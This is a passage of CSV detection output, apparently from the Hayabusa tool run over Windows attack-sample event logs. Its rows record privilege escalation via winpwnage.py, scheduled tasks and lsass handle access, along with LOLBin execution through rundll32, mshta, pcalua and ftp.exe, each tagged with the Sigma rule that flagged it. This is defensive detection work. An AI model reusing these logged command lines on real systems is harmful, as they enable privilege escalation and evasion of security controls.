365ABB72-0D5E-5CD7-0000-0010E6241700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u 
elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent 
Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command 
Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" 
/delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,Persis,Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx 2019-05-12 22:30:32.931 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p 
c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe 
url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | 
Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious 
Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 365ABB72-55C1-5CD8-0000-0010970D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
